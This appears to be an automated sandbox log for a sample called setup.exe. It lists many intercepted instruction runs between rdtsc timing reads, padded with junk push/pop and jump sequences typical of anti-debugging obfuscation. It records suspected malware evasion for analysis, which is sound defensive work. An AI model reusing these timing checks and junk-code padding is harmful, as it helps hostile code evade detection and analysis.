Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA024 second address: EAA028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1C6 second address: EAA1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1D2 second address: EAA1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1D6 second address: EAA1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA4AA second address: EAA4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF8E2D second address: DF8E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF8E45 second address: DF8E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF32CFB71F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB31F7 second address: EB3212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6577h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBB976 second address: EBB98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FF32CFB71FCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBB98F second address: EBB995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C41 second address: EB9C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF32CFB71F8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C51 second address: EB9C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C6F second address: EB9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C73 second address: EB9C7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA46B second address: EBA48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7208h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA48E second address: EBA492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA79F second address: EBA7A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA8FA second address: EBA919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF32CDD6572h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA919 second address: EBA930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA930 second address: EBA938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA938 second address: EBA971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7207h 0x0000000e jl 00007FF32CFB71F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB969A second address: EB96A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB96A2 second address: EB96B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF32CFB71F6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC245C second address: EC2462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2462 second address: EC2474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FF32CFB71F8h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2474 second address: EC2481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2481 second address: EC2487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2487 second address: EC248B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2151 second address: EC2185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FF32CFB7203h 0x0000000b pop esi 0x0000000c popad 0x0000000d jne 00007FF32CFB7218h 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FF32CFB71FEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ECF1E5 second address: ECF1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jng 00007FF32CDD6566h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BC8 second address: ED1BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF32CFB71FDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BE0 second address: ED1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BE4 second address: ED1BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE51EB second address: EE51EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE51EF second address: EE520B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE520B second address: EE5216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE503D second address: EE5046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE5046 second address: EE506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6571h 0x00000009 jno 00007FF32CDD6566h 0x0000000f jmp 00007FF32CDD656Dh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE506F second address: EE5074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE5074 second address: EE507C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE7A01 second address: EE7A0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FF32CFB71F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE917C second address: EE9195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6573h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE9195 second address: EE919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE919A second address: EE91DB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jne 00007FF32CDD656Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jmp 00007FF32CDD6579h 0x0000001a pop edi 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e ja 00007FF32CDD6566h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE91DB second address: EE91E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE91E0 second address: EE9203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD6572h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB71F second address: EEB72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB72E second address: EEB734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB734 second address: EEB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF1A0D second address: EF1A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF1A11 second address: EF1A1D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CFB71F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0376 second address: EF037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0635 second address: EF063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF063B second address: EF0657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD6576h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0657 second address: EF0675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF07C1 second address: EF0801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FF32CDD6574h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop esi 0x00000019 jng 00007FF32CDD6578h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0984 second address: EF099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF099E second address: EF09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0C3A second address: EF0C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF32CFB7201h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF523E second address: EF5250 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF32CDD656Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5250 second address: EF5254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5254 second address: EF5259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5259 second address: EF5278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F13EC0 second address: F13ECC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F13ECC second address: F13ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31818 second address: F3181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F3181C second address: F3182E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF32CFB71F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F3182E second address: F31840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31840 second address: F31844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31F56 second address: F31F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320D9 second address: F320F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7203h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320F7 second address: F320FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320FB second address: F32121 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FF32CFB7209h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F33F1C second address: F33F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36AFF second address: F36B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36B04 second address: F36B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx edx, si 0x0000000f movzx edx, cx 0x00000012 push 00000004h 0x00000014 or dh, 00000018h 0x00000017 pushad 0x00000018 add dword ptr [ebp+124610D8h], ecx 0x0000001e mov edi, 51B18799h 0x00000023 popad 0x00000024 push 1DB18ED8h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36B45 second address: F36B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36E12 second address: F36E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F382E3 second address: F382F6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CFB71FEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0008 second address: 4DB000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB000C second address: 4DB0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0012 second address: 4DB0046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 call 00007FF32CDD6577h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF32CDD656Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0046 second address: 4DB0055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0055 second address: 4DB005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB005B second address: 4DB005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB005F second address: 4DB0063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0063 second address: 4DB00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF32CFB7208h 0x00000014 jmp 00007FF32CFB7205h 0x00000019 popfd 0x0000001a call 00007FF32CFB7200h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB00B2 second address: 4DB00FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FF32CDD656Dh 0x00000013 pushfd 0x00000014 jmp 00007FF32CDD6570h 0x00000019 and eax, 661CAAA8h 0x0000001f jmp 00007FF32CDD656Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB00FC second address: 4DB0114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB7204h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E36 second address: 4D90E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E3A second address: 4D90E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E40 second address: 4D90E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6572h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E56 second address: 4D90E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF32CFB7207h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB7205h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700C3 second address: 4D700C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700C9 second address: 4D700CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700CD second address: 4D70135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF32CDD6576h 0x00000012 push dword ptr [ebp+04h] 0x00000015 jmp 00007FF32CDD6570h 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FF32CDD656Dh 0x00000025 jmp 00007FF32CDD6570h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70182 second address: 4D701A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF32CFB7207h 0x00000014 rdtsc
